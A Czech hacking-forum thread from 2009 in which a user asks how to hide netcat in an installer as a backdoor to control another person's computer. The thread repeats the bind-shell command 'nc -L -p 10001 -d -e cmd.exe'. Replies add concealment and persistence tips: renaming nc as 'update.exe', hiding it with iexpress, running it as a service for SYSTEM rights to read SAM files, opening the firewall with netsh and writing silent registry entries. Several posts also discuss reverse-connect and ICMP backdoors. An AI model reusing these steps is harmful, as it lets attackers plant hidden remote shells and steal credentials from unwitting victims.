Otevreni portu pres NetCat?

HackForum

Otevreni portu pres NetCat?#
ahojte mam takovej dotaz... docetl jsem se neco o programku netcat(dal nc) ze se prez nej da otevrit port na vzdalenem pc a pres ten port dane pc ovladat.. tak me napadlo, ze kdyz dam soubor nc.exe a prikaz pro cmd ve tvaru
"echo off
echo nc -L -p 10001 -d -e cmd.exe" do instalacniho souboru.. a zadam pevnou cestu instalace do C:\WINDOWS\System32... tak by se mi meli oba soubory nainstalovat do dane slozky a kdyz si jeste nastavim aby se mi po instalaci spustil soubor s cmd prikazem mel by se spustit v tichosti nc a vytvorit port 10001 na ktery bych se mel eventuelne lehce pripojit... no zatim to vypada ze nikde neni chyba:D, presto ze jsem to nezkousel na jinych pc.. nejdirve jsem to zkusil na sobe.. instalace probehla v poradku.. i "tiche" spusteni cmd prikazu... ale kdyz jsem si pote skenoval porty.. nikde jsem zadny port 10001 otevreny nenasel... je chyba u me? nebo proste nc v dnesni dobe uz nefunguje? zkousel jsem to i kdyz jsem vypl firewall.. ale nikde zadny port otevreny nebyl:(.. nevite cim to muze byt?
(odpovědět)
mefiik | 62.77.70.*3.5.2009 20:34
re: Otevreni portu pres NetCat?#
Co win firewall pripadne jina podobna vec? Pripojujes se prez 127.0.0.1 ci localhost, nebo pises svoji verejnou IP? Pokud verejnou IP, mas presmerovane porty na routeru?
Jine programy (treba FTP server) ti jdou a jde ti pripojit se na ne? Cim zkousis otevrenost portu? Ses si vazne jistej, ze ti bezi aplikace, ktera mela ten port otevrit? Vidis ji ve spustenejch procesech?
Otevrenost portu si muzes overovat treba pouzitim [link]

----------
public static void main(String args[]){
 throw new UnsupportedOperationException("Not implemented!");
}


(odpovědět)
pr0ph3t4.5.2009 1:40
re: Otevreni portu pres NetCat?#
no na ftp chodim bezne.. firewall od windowsu nemam yaplej.. pouyivam jenom ESET a ten je vyplej... ip na kterou se pripojuji pouzivam tu kterou mi napise www.mojeip.cz... a ty porty overuju jak pres NetCat.. a to jestli aplikace bezi si jistej nejsem.. neoveroval jsem to.. mel by bezet cmd ale jelikoz jsem zadal prikazy s echo off a echo.. tak se mi cmd na plose neukazuje.. znamena to tedy ze kdyz zadam prikaz "
echo off
echo nc -L -p 10001 -d -e cmd.exe"
tak se mi prikaz pusti ale cmd se pote vypne? podle tohodle prikazu by melo cmd otevrit port 10001 a melo by bezet na pozadi systemu... momentalne nejsem doma, ale az prijdu skontroluju jestli cmd opravdu bezi na pozadi systemu...
(odpovědět)
mefiik | 90.176.240.*4.5.2009 13:09
re: Otevreni portu pres NetCat?#
tak to nebude problem u tveho pc ale mezi zidli a klavesnici. To co popisuješ nevim nevim ale budiž. Na sobě bych to urcite nezkousel a ne z duvodu ze bych se bal ale protoze to vetsinou nepude. Spis pokud mas dva pc tak to zapni na jednom a z druheho to proscanuj.

Jinak pres cmd bych to neresil, ale tvoje volba
(odpovědět)
jadus. | 88.103.38.*4.5.2009 15:17
re: Otevreni portu pres NetCat?#
tak sem to ted zkousel.. ale po instalaci se cmd neotevrelo.. ani se neotevrel port... tudiz pokud udelam .cmd soubor a zadam echo off... tak mi cmd nezapne netcat a ten neotevre port..

kdyz sem pak zkousel otevrit zvlast pres nc port 1234 tak jsem ho nasel pres program co mi tu byl doporucen.. ale jelikoz mam oba pc na stejne ip nemohl jsem se pripojit z druheho pc.. nenapada me nic jineho jak jinak poslat prikaz na netcat aby otevrel port a zustal v "tichem rezimu" aby se nezobrazovalo jeho okno...

btw pokud zalezi na tolika okolnostech aby byl port uspesne otevrel.. je velmi mala pravdepodobnost uspechu ze?
(odpovědět)
mefiik | 62.77.70.*4.5.2009 17:38
re: Otevreni portu pres NetCat?#
aha, tak zde je jadro pudla

samozrejme nemas obe pc na stejne ip, to ze ti stranka myip.dk ukaze stejny pouze znamena, ze si za NATem, a ten te za tohle ip schova... nicmene po lokalni siti muzes adresovat komp pomoci 192.168.blabla nebo 10.blabla nebo podobne. ipconfig /all way to go
(odpovědět)
cURLy bOi | 217.195.168.*9.5.2009 13:35
re: Otevreni portu pres NetCat?#
radsi se nauc programovat toto nema smysl a neni to zrovna elegantni
(odpovědět)
cP | 74.207.224.*4.5.2009 17:49
re: Otevreni portu pres NetCat?#
s cmd moc zkušenosti nemám, ale zdá se mi divný řádek

echo nc -L -p 10001 -d -e cmd.exe

nevyřeší se to odstraněním "echo" ?

nc -L -p 10001 -d -e cmd.exe
(odpovědět)
mr.Crow. | 213.211.34.*4.5.2009 17:56
re: Otevreni portu pres NetCat?#
cP- neptam se jestli se vam to zda elegantni nebo ne:) ale zkousim najit kde je problem...

mr.Crow.- to echo udela aby se cmd nespustilo uzivateli na oci.. aby udelalo dany prikaz na pozadi...
(odpovědět)
mefiik | 62.77.70.*4.5.2009 18:18
re: Otevreni portu pres NetCat?#
echo ti ten string pouze vypise na vystup, nic na pozadi nespusti...
(odpovědět)
Emkei | E-mail | Website | PGP4.5.2009 18:31
re: Otevreni portu pres NetCat?#
aha.. tak proto to nejde z ty instalace... je teda jinej zpusob tak potichu spustit ten nc.exe a zadat mu potrebnej zpusob?

kdyz sem si u sebe pustil ten port(1234) tak mi ho Currports nasel takhle
[link]
(odpovědět)
mefiik | 62.77.70.*4.5.2009 18:45
re: Otevreni portu pres NetCat?#
pokud to chces opravdu skryt, napis si launcher, ktery proste spusti cokoliv se mu da do prikazaku, zkompiluj ho jako exe (treba visual basic, tam je to easy), pote ho zaved jako sluzbu pomoci "sc create blablabla", dej mu jako parametr to nc. pri startu pocitace se nahodi ten launcher, ktery spusti nc.exe nasledne windows zjisti, ze launcher se nechova jako sluzba tak ho zase sestreli, ale nc bude bezet dal. tak dokonce ta sluzba bude vypadat jako vypnuta, ackoliv to, co spustila uz pobezi dal a to dokonce s opravnenim SYSTEM, tzn. s opravnenim i cist SAM soubory a podobne blbinky;)
(odpovědět)
cURLy bOi | 217.195.168.*9.5.2009 13:38
re: Otevreni portu pres NetCat?#
*potrebnej prikaz
(odpovědět)
mefiik | 62.77.70.*4.5.2009 19:00
re: Otevreni portu pres NetCat?#
mefiik >>

1) prez port zadnej pocitac neovladnes, mozna jsi myslel prez prikazovy radek (cmd.exe) na ktery pomoci parametru -e vytvaris pipe.


2) pr0ph3t ti rekl kde muze byt problem; me napada jakou mas verzi nc ? Napriklad ja sem downgradoval.

D:\>nc -h
[v1.10 NT]

Tato verze pipes nepodporuje. Nejspis pipe's u nc byli duvod proc AV spolecnosti dali do seznamu tzv. "hack tools".

3) ceho chces dosahnout prikazem "echo nc -L -p 10001 -d -e cmd.exe" ? Prostuduj si znova syntax prikazu echo, mozna jsi chtel presmerovat vystup ( > || >> ) ?

4) tvoje overovani "otevrenosti portu" je idiotske.
zkuz to takhle

D:\>netstat -ano | find "10001"
TCP 192.168.1.102:10001 0.0.0.0:0 NASLOUCHµNÖ 4

Stejne se da overit jestli vubec bezi aplikace, v nasem pripade "nc.exe"

D:\>tasklist | find "nc.exe"
c.exe 2544 Console 0 2524 kB

5) to ze das do .cmd | .batu "echo off" neznamena ze se ti .... a vubec, uz sem o tom psal vejs, prostuduj si kurva tu dokumentaci.

6) kontrolovat IP adresu prez mojeip.cz je stupidita. ipconfig /all a najdi si spravny sitovy rozhrani neasi.

7) stale plati to co jsem psal predtim, i kdyz to zprovoznis bude to neelegantni a urcite to nebude fungovat podle tvych predstav.


(odpovědět)
cP | 74.207.224.*4.5.2009 19:11
re: Otevreni portu pres NetCat?#
Ha nez jsem dopsal taxe debata posunula :) Fuj, na detekci otevrenych portu je dnes treba super GUI app ? :P :D
(odpovědět)
cP | 74.207.224.*4.5.2009 19:13
re: Otevreni portu pres NetCat?#
i kdyz je rada od cP vycerpavajici, presto ti dam jeste jeden tip. pokud si neumis naprogramovat sam podobne jednoduchou aplikaci, pak nc prejmenuj na nejaky duveryhodny kus software (eg. update.exe) a jeho okno po spusteni skryj pomoci utility iexpress (standardne ve windows). jak se ta utilita pouziva si doufam dokazes dohledat sam...
(odpovědět)
Emkei | E-mail | Website | PGP4.5.2009 19:32
re: Otevreni portu pres NetCat?#
Dekuju poohlidnu se jak na ten iexpress.. ale jeste me zajima kdyz tedy udelam to co jsi psal... jak tedy nc dodam potrebny prikaz? to musim udelat pres cmd?
(odpovědět)
mefiik | 62.77.70.*4.5.2009 19:43
re: Otevreni portu pres NetCat?#
hod si to cele do davkoveho (bat/cmd) souboru a ten nastav jako instalacni, pak se po spusteni prikazy provedou (spusteni nc vcetne parametru), aniz by se uzivateli ukazalo jakekoliv okno.
(odpovědět)
Emkei | E-mail | Website | PGP4.5.2009 19:53
re: Otevreni portu pres NetCat?#
Mooc dekujuu.. pomohlo to:)
(odpovědět)
mefiik | 62.77.70.*4.5.2009 21:15
re: Otevreni portu pres NetCat?#
1.) chtel jsem pouzit nc jako backdoor, kde bych udelal port a pres ten pc pomoci cmd ovladal.. jako je v clanku zde [link]

2.) mam verzi jako si napsal 1.10 NT.

3.) prikazem ""echo nc -L -p 10001 -d -e cmd.exe"" sem chtel dosahnout spusteni nc v pozadi a, aby mu cmd dal prikaz "-L -p 10001 -d -e cmd.exe" a vytvoril port... a aby to uzivatel nezjistil proto "echo".

4.) port jsem si zkousel overit pres 4 ruzne programy.. a ani jeden mi danny port nenasel... jen mi ho Currports nasel ze je vytvoren, ale jine "scannery" mi ho nenasli...

5.)/

6.) mozna to je stupidita ale pres prikaz "ipconfig /all " se mi bohuzel nezobrazi ip adresa pod kterou vystupuji na netu:) proto pouzivam "stupidni" mojeip.cz...

7.) Nevim co si myslis ze od toho ocekavam.. ale jak sem napsal a je napsano v clanku zde [link] chci pouzit nc jako backdoor..
(odpovědět)
mefiik | 62.77.70.*4.5.2009 19:35
re: Otevreni portu pres NetCat?#
achjo :-)

echo off - tímto zajistíš "tichost". Radím ti - ten druhý řádek bez "echo" ;)

a ještě by mě zajímalo, jestli nejsi za NATem.
(odpovědět)
mr.Crow. | 213.211.34.*4.5.2009 19:46
re: Otevreni portu pres NetCat?#
oka zkusim to...

jo.. nejspis jsem:D
(odpovědět)
mefiik | 62.77.70.*4.5.2009 19:57
re: Otevreni portu pres NetCat?#
Celkem urcite je.

----------
public static void main(String args[]){
 throw new UnsupportedOperationException("Not implemented!");
}


(odpovědět)
pr0ph3t5.5.2009 3:11
re: Otevreni portu pres NetCat?#
mefiik; Zkus si najit neco o prikazovem radku, manual k nc, precti si neco o sitove komunikaci (TCP/IP), nastuduj jak funguje firewall, router a NAT.

Pak budes mit dost informaci, aby jsi nebyl za kokota.

Dale bude na case zacit se ucit programovat. Nebudu ti doporucovat jazyk, protoze zadnej univerzalni neexistuje, dulezita je algoritmizace. Az ovladnes programovani alespon do te miry ze zvladnes pouzivat socket, muzes se snazit o backdoor.

Odhaduju, ze nez to vsechno zvladnes, bude ti sice o par let vic, ale aspon se nebude ztrapnovat na soomu.
(odpovědět)
Nechces vedet | 216.120.241.*4.5.2009 20:06
re: Otevreni portu pres NetCat?#
Jak vypada takovej jednoduchej backdoor se muzes podivat treba tady

[link]

Ma dost funkci, heuristika ho ale detekuje =))))))
(odpovědět)
cP | 74.207.224.*4.5.2009 20:29
re: Otevreni portu pres NetCat?#
Nic moc, ale hezkej napad s tim irc :D
mas src?
(odpovědět)
babca | 193.86.144.*5.5.2009 0:28
re: Otevreni portu pres NetCat?#
cP: klikaci utilitu na overeni otevrenosti portu jsem mu doporucil, protoze jsem si nemohl za boha vzpomenout na prikaz netstat a taky protoze jsem mel pocit, ze clovek jako on grfickou utilitu uvidi radsi ;-)
Samozrejme tvoje reseni je daleko elegantnejsi.

----------
public static void main(String args[]){
 throw new UnsupportedOperationException("Not implemented!");
}


(odpovědět)
pr0ph3t5.5.2009 3:09
re: Otevreni portu pres NetCat?#
tak jasne ze mam, kdyz sem to psal =) ale je to moooc stara vec, ten kod je fakt praseci++ :D Je to psany tak ze se z te binarky da poznat co to dela co to umi :) takze dissasembler rullez ;P

pr0ph3t : to byl jen joke :D a mas pravdu, clovek jako on uvidi GUI radeji =)
(odpovědět)
cP | 74.207.224.*5.5.2009 8:07
re: Otevreni portu pres NetCat?#
stejne i kdybys to nejak udelal nebude to fungovat podle tvych predstav.I kdyby tak to bude tak neefektivni ze to bude k nicemu. A pokud ma ten tvuj kamarad nejaky lepsi antivir tak zarve. A jeste dotaz. Nenapadlo te proste si nakodit vzdalenou prikazovou radku sam? To dneska zvladne i male dite.

Stejne to budes jen pouzivat abys ho tim neskutecne sral a mazal mu soubory a bavil se tim jak je bezmocny.

jeste kolik je ti let??
(odpovědět)
jadus. | 88.103.38.*5.5.2009 16:35
re: Otevreni portu pres NetCat?#
podle .cCuMiNn. se da nc pouzit jako backdoor... tak jsem to chtel zkusit...

myslim ze 90% lidi co znam si nakodit nedokazou ani kalkulacku:) natoz udelat kod pro vzdalenou prikazovou radku:)

Nevim jakou roli v tomhle hraje muj vek...
(odpovědět)
mefiik | 62.77.70.*6.5.2009 18:18
re: Otevreni portu pres NetCat?#
a jak starej ten clanek je ? :)
(odpovědět)
cP | 74.207.224.*7.5.2009 8:00
re: Otevreni portu pres NetCat?#
jadus zase komentar uplne k nicemu. me by zajimalo jak ty sam bys takovou aplikaci naprogramoval.
a proc se ho ptas kolik mu je let ? tobe je tak 12 ale ani to neni podstatny imo.
(odpovědět)
cP | 74.207.224.*6.5.2009 16:07
re: Otevreni portu pres NetCat?#
cP: No jednoduse udelal bych si dve casti. SErverovou kterou bych dal na cilove pc a klienta ktery by se odemne pripojoval. Do serverove casti bych nakodil funkce ktere se maji vykonat po prijeti prikazu z klientske strany. Pokud bych delal vzdalenou prikazovou radku tak bych odesilal vsechny prijate prikazy z klienta do promptu cmd.exe a vystupy tech prikazu bych si nechal zpetne odesilat ke klientovi. Jak proste ze?

A ten clanek je sice stary ale vetsiny postupu stale funguji, jenze vetsina postupu nejde praktikovat s dnesnim zabezpecenim pocitacu. Tak maximalne jako leet banner graber nebo hodne odlehcenej port scanner.
(odpovědět)
jadus. | 88.103.38.*7.5.2009 15:56
re: Otevreni portu pres NetCat?#
Jo, a kdyz bude za NATem, tak se muzes jit klouzat, chichi :-)

----------
public static void main(String args[]){
 throw new UnsupportedOperationException("Not implemented!");
}


(odpovědět)
pr0ph3t8.5.2009 1:09
re: Otevreni portu pres NetCat?#
pr0ph3t >>
no dyt jo, jen strili terminama ktery si nekde precet, nech ho v tom; to, ze tenhle x let starej model backdooru nema sanci.

Abych to trochu rozvedl >


A ten clanek je sice stary ale vetsiny postupu stale funguji, jenze vetsina postupu nejde praktikovat s dnesnim zabezpecenim pocitacu. Tak maximalne jako leet banner graber nebo hodne odlehcenej port scanner.


Jadus >>
To co jsi popsal ve stejnem prispevku o par radek vys (mimochodem dost zmatecne) funguje na stejnem principu, jak proste ze ? listen() na boxu kterej chces ovladat uz je minulost, to uz davno nefrci. Je to z nekolika prostych duvodu.

1) jak rekl pr0ph3t, NATy. IPv4 adresy pomalu dochazi a nahozeni IPv6 neni jentak (financne) takze ISP's voli pro ne levnejsi variantu. Ale na masinu za NATem se proste takhle nepripojis. Na to je potreba reverse connect -> infikovanej stroj musi byt KLIENT !

2) firewall. hafo fw je uz v zakladu nastaveno na blokovani/zahazovani jakehokoliv nevyzadaneho spojeni zvenku. kdezto odchozi spojeni podlehaji vetsinou o neco mene prisnym restrikcim. to je obecna teorie, v praxi je to samozrejme mnohem slozitejsi a musis vedet "ktera packa".zkusenejsi user si hlida i odchozi spojeni.

3) stopovani. je mnohem vyhodnejsi (pro utocnika), aby se infikovanej stroj pripojoval k nejakemu serveru nekde v hlouby internetu s tim ze on na tento server pristoupi bezpecne prez proxy. i kdyz toto uz je taky nekolik let stary model, napriklad backdoory/trojany pripojujici se k IRC serverum. dnes uz to funguje trosku jinak, p2p site, generovani _pristupovych bodu_ ktere neni lehke odhadnout, apod. dalo by se to zhrnout do terminu dynamicnost.

4) vyuzivani chyb a slabeho zabezpeceni - nemuzes si naivne myslet, ze vytvoris socket, zavolas connect a mas vyhrano. neexistuje universalni backdoor, je treba analyzovat "kde to ma bezet". priklad > oscanujes masinu a zjistis ze nezahazuje icmp (fook!). zde bys mohl pouzit icmp backdoor.


(odpovědět)
cP | 74.207.224.*8.5.2009 11:50
re: Otevreni portu pres NetCat?#
ty jsi nechtel vedet jestli bude fungovat, tys chtel vedet jak ji udelam a vic nic.Jako example staci. I kdybych takovou aplikaci bych nikdy se zlym umyslem nedelal, a i kdyby tak by mi vetsinou byla k nicemu. Radsi napisu neco co si potrebne udaje nevedomky stahne z netu. Nechal jsem se inspirovt confickerem i kdyz to byl jen aprilovy zertik (prý)

O problemech typu IPv6 a NAT vim, avsak i ty se daji obejit.
(odpovědět)
jadus. | 88.103.38.*10.5.2009 14:07
re: Otevreni portu pres NetCat?#
taxe pochlub tvym kodem ne ? nebo uz ho pouzivas ve velkym a bojis se ze by te CIA, FBI, NSA, NBU, LOL, ... vystopovala ? :]
(odpovědět)
cP | 74.207.224.*10.5.2009 15:00
re: Otevreni portu pres NetCat?#
nevidim vice jak 3 duvody proc bych mel zde uveřejnovat svoje kody.
A taky jsem nerikal ze to mam napsane, rikal jsem ze kbybych psal tak bych pouzil koncept ktery pouzil conficker.

Az budu nekdy neco podobneho psat dam ti vedet
(odpovědět)
jadus. | 88.103.38.*10.5.2009 17:20
re: Otevreni portu pres NetCat?#
Co je podle tebe IPv6, když tomu říkáš problém a chceš to obcházet?

(Já bych spíš mluvil o řešení, které je třeba využít. ;))
(odpovědět)
mr.Crow. | 213.211.34.*10.5.2009 21:30
re: Otevreni portu pres NetCat?#
ja uz to neresim. IPv6 je malý problém, i když už je dnes většinou plně podporován mohly by být problémy, při spojení atd nebudu to dále rozvádět
(odpovědět)
jadus. | 88.103.38.*11.5.2009 14:53
re: Otevreni portu pres NetCat?#
jasan :-)
(odpovědět)
mr.Crow. | 213.211.34.*11.5.2009 16:49
re: Otevreni portu pres NetCat?#
skoda doufal jsem, ze se neco dozvim :(
(odpovědět)
cP | 74.207.224.*11.5.2009 17:18
re: Otevreni portu pres NetCat?#
jen pro uplnost uvadim ze windows firewall se da obejit prikazem:

netsh firewall add allowedprogram ...

dal je samozrejme pomoci davky mozny ten prikaz s nc.exe primo soupnout do registru pomoci

echo "REGEDIT4">bla.reg
echo.>>bla.reg
echo "[HKEY_blablabla"]>>bla.reg

a nakonec ten soubor zapsat do registru pomoci
regedit /s bla.reg
(odpovědět)
cURLy bOi | 217.195.168.*9.5.2009 13:32
re: Otevreni portu pres NetCat?#
radsi se spolehnu na demenci uzivatele :-D
(odpovědět)
jadus. | 88.103.38.*13.5.2009 16:43

Zpět
Svou ideální brigádu na léto najdete na webu Ideální brigáda
 
 
 

 
BBCode